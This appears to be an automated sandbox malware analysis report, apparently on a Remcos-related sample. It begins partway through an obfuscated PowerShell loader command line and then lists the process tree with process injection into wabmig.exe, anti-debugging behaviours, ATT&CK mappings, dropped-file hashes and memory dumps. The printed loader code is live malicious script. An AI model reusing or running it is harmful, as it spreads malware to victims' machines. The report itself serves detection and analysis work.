SafaLBrandiUnan.tLing t Ba eEOrnitR enneE Aa br hir= Au,inPersoECarpoW Sour-Traymocan.ibStodgjHomo.EForsyC emiotVel o Telefs Ans.yDeforsSleuttBurgleF gurMAddit.IberiNAfsnieDemoltGynos.Kont w IsabEsyltebHemaucPreh,lKnessiImpurED sgaNOptimt');$Veterinrsygeplejerske+=$Unfeignedly244[1];Gunnybag ($Veterinrsygeplejerske);Gunnybag (Unmordant 'Admir$ rchpA StenlNoledl Snebi napstStr.nt sgemeAbbozrMisspeDegrarDandi.PargeHIntoneThr caGteskd autoeT gltrlderps ont[Under$Ser iDMdelooSpytsvDorrseVersanAngussLandekaidfuaPaagrbUndereInitinDiact2nonnu3Charm]Far a=Mo.he$ PhylP Circs BriseUncaru pahidBal yoMethylRetsaoUovergAbsciiwurtzc Semia CoadlS rkllSkribyUltra ');$Beylics=Unmordant 'Gripp$SkabeA Tripl BusklOutw.iB hovtO gelt b rieRestyr SkrieNonb r,ooki.EpipsDtrombo Wafewregisn SoublQuartoLlbinaAl yod HummFAnechiDireklVi,eneKhane( way$BomulU skolnBiss,dDi igeLandfrLys rd ebyruF,erkn AborgC,teregenv d rdru,svrds$V kstTuanverBandsi utancReplahSstjeoLeflesSivebpVaciloProgrrArse a rintnIn isg For iH odoa F ctlHelio) Vurd ';$Trichosporangial=$Unfeignedly244[0];Gunnybag (Unmordant 'Whirt$.espoG ortblN.ncooBobinbBrandATurdalPopu :agaretPiazirCarobiFu iclpegasIStallT onarhHenvioZarebnYacht= S ff(Rip oTagt lePre eSBn,haTPytho-UnselP rgenAMajketantabhOdori Undel$SmallTejec RModskIDyfleCKvittHKardiO.radeSSt rmP,knheOE ulaRReve,ASpaann.agwogLegetiUdtryaspecilB obd)Ethno ');while (!$Trilithon) {Gunnybag (Unmordant 'Redni$YardfgFusiolPse doO erdbHjstaaIldlslB,eph:PostfCAbattlShealaReglawSk roeNonmadSonor= Avnb$I restOmdelr Jt euSt,eneMenis ') ;Gunnybag $Beylics;Gunnybag (Unmordant 'Tra hSFilabtSu etabrandr TilbtTor e-Kond.SNeg sludemie,aywoeR jeop Con. Homog4Mlket ');Gunnybag (Unmordant 'S.bro$ Diacg.arrilA ydooLetsibGendia.elstlscaff: unfeT ehavrGaleaiR acclC ingiSknditTuttehPh rmoBrashnAm.ia= Copy(Br nzT.phereTor msO ciat.rost-Ver.iPFisk aD mintReporhQuodl Indbe$M semTdu perAnglei Cli cDrog hAra,io UnassFatalpKarakoZeroarMasdea ritnV lgagFgtniiAttleaFremsl thew)Overs ') ;Gunnybag (Unmordant 'Za ar$Limm gOrganl utomoGastrbOphtha Aud lBr nd:OversEMik.omHiberiMod ag,yvaarTracka S.ignCranetRodnesHemps=Grupp$Ewtefg S atlAfearoAnsvabssteraHex plmntin:SrklaBTele.oBaarigPa risSilket LeasaUnplovmeinekOmsadoC,rbod SalaeTawnin.dmaasLumme+ Skyt+a tac% Lbet$HasteKRa eluNettonLegalsI tratRamshnRewade Dis rAsimeiProfesLychnkAktiee aad.Stor cVekslo redsuKabelnStikltAf if ') ;$Underdunged=$Kunstneriske[$Emigrants];}$Gsteforelse=305321;$Decahedron=28935;Gunnybag (Unmordant ' Nonn$StrejgHairll UgenoGrafibA,veraAnastlFresi:SvigeP SkderNikkeeS.perd oveiSinkncsquelaStarttFrostiGod.rntrykngBefa,9Witto7Misco Koiar=Nonfi HardeG .engeincubt Deco-SuburCPedalo revn coxptUdsmyeP obenForwetsnaps Speci$ MaleTTriplrBes riSovemc Dagph SmokoH,sitsGarg,pHeresoC efsrFluctaUdfalnSe ifgUnconiUnperaof.inlBartr ');Gunnybag (Unmordant 'Ser i$ InnagMrklalNu,syoDua.ibIcekha,rintlErsta:UnspeFBlikve AfvicTjrmokR.shifAnstiu PoodlHyphelpre.cyabern Inds= Fum. Skatt[ ChigSCognay ynsisSundht Ge heR,ssom.orfr.StampCPsycho Ef.en Nonev OpereUmorarKr.stt .nco]Kompa:Opsvu:BilbyFVaaberEntero izelmVindpBcha caCutbasGu tleUtero6Angos4ScorbStelegt tranrVrng iForeinUnd rgAktiv(Kybel$K,lniPVindtrHespeeFif idIndfaiArthrc Arbea,ornetTo,oniSimi.nRuf.egRef.i9Prism7Mohab)Biote ');Gunnybag (Unmordant 'Cho e$ParadgNonagl rigsoPeriobEkspoauroval gren: in kA AbjulBac skShippo arih reevoConvulHera lRettes Je skNonmyaCicerd Punte ustrtForn. Te,n=Aa ds u,pen[UsikkSKoketyTobaksPreb tPersyeVandfmGadab. loomTLsegle .losxAkastt Plan.Uni aERelatnNewshc Rem oKn,brdSammei TanknRumblg Turi]Vol.u:Vandl:LnstiAM.tasSBeskaCSaldoI ParlIInfla.OcreaGStrateHarmot HomoSDoktot Re rrSheriiMa.egnCloghgherma( Agra$arthrF liveeHabutc okskGrapef TrevuVituplMercilC gwaySekti)Hjmod ');Gunnybag (Unmordant 'budge$EberhgK.alil FienoGildabJunciaW ongl nder:.lectSChefko PdoffB ligacarrop DnieuNegridIsraee Hj pnsmede=Ordin$TypifAPolarl M ndkTremaoConvohU,gdooGodshlCoseyl UnstsOvertk R gsaTrifadStafeeOpsent onde. AbscsChoosu Campb Pap sSl eptsetter Jer iU.rign.ellig N,nl(Tilhy$Hes.eGBr nesMod tt abbieJudd flu,teo Dgnar Showe Rhodl TigesSkiv eTr ns,Windo$SundhDSensieSprogcStabiataniehTred.eMislidSilderP,onaoOffennpow e)Klere ');Gunnybag $Sofapuden;"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Network Service Discovery
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1620
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Indlaanet.Sor && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4548
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:3440

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Network Service Discovery

Query Registry

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\remcos\logs.dat

Filesize
144B

MD5
9868c0a56fde3c65195b17c220510951

SHA1
ca0a09032de37e7f975716ed14e46fb19fd4b71b

SHA256
fcbf3c1dc2e7db3e09f653b21736f53479c83da14491c446ca74a4e965d737f1

SHA512
366819b040fadde9b58b189fac1691e4548e81c1b640395dfbe5fbecf5411c7c8acf57ef274f10c1b5f3626e9e69397f74b5a6abca7edaf3c487095194c8161d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2lr3xi0v.3hy.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Indlaanet.Sor

Filesize
435KB

MD5
d1d94e8b3529057db3dc0cbe4e6f616a

SHA1
a4dd4b336557a88d2e165cd6f7aab679095efc33

SHA256
c19e7f8bf24326c8eda4569400e723dace3753f4edab2577f89b70585664cb15

SHA512
06460dd08693c88daab40c9c9621a1c85b7e07408e34e02bd01d8989b14dcf1caf082a8c58889bc131b97929c938fce63d87f64de08e5e0be256b2d97148ce6c

Download Submit
memory/1100-16-0x00007FF9BBA80000-0x00007FF9BC541000-memory.dmp

Filesize
10.8MB

Download
memory/1100-12-0x00007FF9BBA80000-0x00007FF9BC541000-memory.dmp

Filesize
10.8MB

Download
memory/1100-15-0x00007FF9BBA83000-0x00007FF9BBA85000-memory.dmp

Filesize
8KB

Download
memory/1100-0-0x00007FF9BBA83000-0x00007FF9BBA85000-memory.dmp

Filesize
8KB

Download
memory/1100-17-0x00007FF9BBA80000-0x00007FF9BC541000-memory.dmp

Filesize
10.8MB

Download
memory/1100-11-0x00007FF9BBA80000-0x00007FF9BC541000-memory.dmp

Filesize
10.8MB

Download
memory/1100-62-0x00007FF9BBA80000-0x00007FF9BC541000-memory.dmp

Filesize
10.8MB

Download
memory/1100-43-0x00007FF9BBA80000-0x00007FF9BC541000-memory.dmp

Filesize
10.8MB

Download
memory/1100-10-0x0000022173630000-0x0000022173652000-memory.dmp

Filesize
136KB

Download
memory/1100-35-0x00007FF9BBA80000-0x00007FF9BC541000-memory.dmp

Filesize
10.8MB

Download
memory/1620-33-0x00000000063A0000-0x00000000063BE000-memory.dmp

Filesize
120KB

Download
memory/1620-21-0x0000000005C00000-0x0000000005C66000-memory.dmp

Filesize
408KB

Download
memory/1620-34-0x00000000063D0000-0x000000000641C000-memory.dmp

Filesize
304KB

Download
memory/1620-22-0x0000000005C70000-0x0000000005CD6000-memory.dmp

Filesize
408KB

Download
memory/1620-36-0x0000000007D20000-0x000000000839A000-memory.dmp

Filesize
6.5MB

Download
memory/1620-37-0x0000000006910000-0x000000000692A000-memory.dmp

Filesize
104KB

Download
memory/1620-38-0x00000000076A0000-0x0000000007736000-memory.dmp

Filesize
600KB

Download
memory/1620-39-0x00000000075B0000-0x00000000075D2000-memory.dmp

Filesize
136KB

Download
memory/1620-40-0x00000000083A0000-0x0000000008944000-memory.dmp

Filesize
5.6MB

Download
memory/1620-32-0x0000000005D90000-0x00000000060E4000-memory.dmp

Filesize
3.3MB

Download
memory/1620-42-0x0000000008950000-0x000000000BB55000-memory.dmp

Filesize
50.0MB

Download
memory/1620-20-0x00000000054C0000-0x00000000054E2000-memory.dmp

Filesize
136KB

Download
memory/1620-18-0x0000000002B90000-0x0000000002BC6000-memory.dmp

Filesize
216KB

Download
memory/1620-19-0x00000000055D0000-0x0000000005BF8000-memory.dmp

Filesize
6.2MB

Download
memory/3440-58-0x0000000000B20000-0x0000000001D74000-memory.dmp

Filesize
18.3MB

Download
memory/3440-59-0x0000000001D80000-0x0000000004F85000-memory.dmp

Filesize
50.0MB

Download
memory/3440-44-0x0000000001D80000-0x0000000004F85000-memory.dmp

Filesize
50.0MB

Download

Analysis

Sharing